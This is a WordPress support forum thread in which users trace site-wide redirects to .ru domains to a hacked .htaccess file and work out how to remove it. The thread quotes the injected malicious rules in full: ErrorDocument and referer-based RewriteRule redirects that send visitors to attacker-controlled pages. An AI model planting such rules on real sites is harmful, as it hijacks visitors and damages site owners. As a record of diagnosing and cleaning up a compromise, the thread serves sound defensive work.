Posted 1 year ago #
All my facebook links are being hijacked to softwarepromo.ru and eventually activationcode.ru.
When I tried to edit your plug-in, my browser makes several calls to softwarepromo.ru and then loads a bad imitation of the wordpress dashboard.
What is your relation to this domain.
Google is blocking all websites with links to my site using your plug-in
Posted 1 year ago #
I have no relation to this domain.
My best guess: your WordPress installation has been hacked.
Posted 1 year ago #
Yes, I am sure it has been hacked, but it is only this plugin that is affected. Someone is writing a hack specifically for this. Trying to delete the plugin causes the same poor quality fake dashboard.
Posted 1 year ago #
Contact me through the contact form here and I will see what I can do for you.
Posted 1 year ago #
This turns out to be a htaccess hakc-
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
ErrorDocument 400 http://promosoftware.ru/apacabar/inde.php
ErrorDocument 401 http://promosoftware.ru/apacabar/inde.php
ErrorDocument 403 http://promosoftware.ru/apacabar/inde.php
ErrorDocument 404 http://promosoftware.ru/apacabar/inde.php
ErrorDocument 500 http://promosoftware.ru/apacabar/inde.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://promosoftware.ru/apacabar/inde.php [R=301,L]
</IfModule>
Posted 1 year ago #
Be sure to scroll right to see the entire hack.
Posted 1 year ago #
So what now? Where and how do I take care of this problem?
Posted 1 year ago #
If you have this problem: edit your .htaccess file, delete the rules below the WordPress section and protect it from changing again.
To be clear: this problem has nothing to do with Add Link to Facebook itself.
Posted 1 year ago #
Now which .htaccess file? There is one in the main area and one in the logs folder. Probably more as well. I just don't want to kill the wrong thing and, so far, I can't find what deenorris is showing up top. But believe me it is the problem.
Posted 1 year ago #
Post the content of both .htaccess files here or use this contact form to send them to me (you will have to zip them) and I will see if I can help you with this.
My best guess it is the one in the root folder of your WordPress installation.
Posted 1 year ago #
This is the one in the main area...
AddType x-mapp-php5 .php
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
# BEGIN Audiobar
# END Audiobar
This is the one in the logs folders
Options +Indexes
Satisfy any
Order Deny,Allow
Allow from 172.17.0.0/16
Allow from 212.227.35.64/27
Allow from 212.227.34.151
Allow from 212.227.34.190
Deny from all
RemoveType .html .gif
AuthType Basic
AuthName "Access to /logs"
AuthUserFile /kunden/homepages/24/d275942758/htpasswd
Require user u52290778
Posted 1 year ago #
I don't see any problem.
Did you scroll down and left to see if there is more hidden?
Posted 1 year ago #
Concentrate on the first one, the second is probably not relevant.
Posted 1 year ago #
GOT HIM! Here's the better copy of the first one. (Scroll way down)
AddType x-mapp-php5 .php
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
# BEGIN Audiobar
# END Audiobar
ErrorDocument 400 http://software-promo.ru/klm/index.php
ErrorDocument 401 http://software-promo.ru/klm/index.php
ErrorDocument 403 http://software-promo.ru/klm/index.php
ErrorDocument 404 http://software-promo.ru/klm/index.php
ErrorDocument 500 http://software-promo.ru/klm/index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://software-promo.ru/klm/index.php [R=301,L]
</IfModule>
Posted 1 year ago #
Just delete everything including audiobar?
Posted 1 year ago #
No, only remove:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
... up to ...
</IfModule>
Posted 1 year ago #
Posted 1 year ago #
@deenorris: could you send me your debug info too, please?
Posted 1 year ago #
You need to modify the .HTACCESS in the PUBLIC_HTML folder to removed the hack.
First you need to change the permissions because the hack sets it 444.
Once you have edited the .HTACCESS file, you should harden it by setting it back to 444.
This is a hack using wordpress itself to modify the .HTACCESS file.
Good Luck
Posted 1 year ago #
Which hosting provider are you both using?
I am curious if it happen to be the same one.
Posted 1 year ago #
Never even got as far as debug. Once I figured out the .HTACCESS trick, I removed the offending IF BLOCK and it was fine.
It was odd that every time I tried to access ADD LINK from the dashboard, it make a call to the .RU address and I got the crappy imitation. Once I removed the .HTACCESS hack, it stopped.
Again, I am not accusing, but clearly something is going on.
When I spoke to my hosting company, HOSTMONSTER, they said they are seeing a lot of this hack in the past week or so from WP users.
Posted 1 year ago #
How do I change permissions? Sorry, tech savy but a technical newbie.
Posted 1 year ago #
I'm with 1&1 btw.
Posted 1 year ago #
Using FTP or using the dashboard of your hosting provider.
Posted 1 year ago #
Found the permissions in filezilla.
Posted 1 year ago #
Please don't forget to send me the debug information. Maybe I can find what you have in common, except for Add Link to Facebook (without saying that Add Link to Facebook couldn't be the cause, but I have no idea how). From the FAQ:
S02 How can I send the debug information?
Go to the plugin page (via the Tools menu) and click on the link Debug information in the Resources panel. Optionally fill in your name and describe the problem as accurate as possible and press the Send button.
Posted 1 year ago #
I keep trying to edit and save the new .htaccess but it says "critical file transfer error" any ideas?
Posted 1 year ago #
Posted 1 year ago #
you have to change the permissions to allow Owner Read/Write first
The hack sets the file to read only
Posted 1 year ago #
M66B The wordpress administration panel plugin page? Can't seem to find it.
This topic has been closed to new replies.
